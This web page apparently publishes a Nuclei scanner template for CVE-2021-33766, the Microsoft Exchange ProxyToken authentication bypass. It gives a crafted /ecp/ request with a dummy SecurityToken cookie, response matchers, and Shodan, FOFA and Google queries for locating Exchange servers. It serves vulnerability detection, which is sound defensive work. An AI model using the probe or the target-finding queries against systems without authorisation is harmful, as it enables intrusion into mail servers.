Microsoft Exchange - Authentication Bypass

CVE-2021-33766

Early Release

Description

Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.

Severity

High

CVSS Score

7.3

Affected Product

exchange_server

Published Date

October 10, 2025

Template Author

daffainfo

CVE-2021-33766.yaml

id: CVE-2021-33766

info:
  name: Microsoft Exchange - Authentication Bypass
  author: daffainfo
  severity: high
  description: |
    Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
  reference:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766
    - https://www.zerodayinitiative.com/advisories/ZDI-21-798/
    - https://github.com/demossl/CVE-2021-33766-ProxyToken
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-33766
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:cve-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
        Host: {{Hostname}}
        Cookie: SecurityToken=x

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<span id="msgCode">403</span>'
          - 'function signOut() {'
        condition: and

      - type: word
        part: header
        words:
          - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException"
          - "X-BEResource="
        condition: and

      - type: status
        status:
          - 403
# digest: 4a0a004730450220087fcb26561c682077f150013b33114dc587f3800bfb0dcbc44067bf4c46adb5022100e669dcb4f991ace62475c9e709ffd6407cd8c832e01cc6df58b4ee97e4289607:922c64590222798bb761d5b6d8e72950

7.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE ID:

cve-2021-33766

CWE ID:

nvd-cwe-noinfo

References

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766 https://www.zerodayinitiative.com/advisories/ZDI-21-798/https://github.com/demossl/CVE-2021-33766-ProxyToken https://nvd.nist.gov/vuln/detail/CVE-2021-33766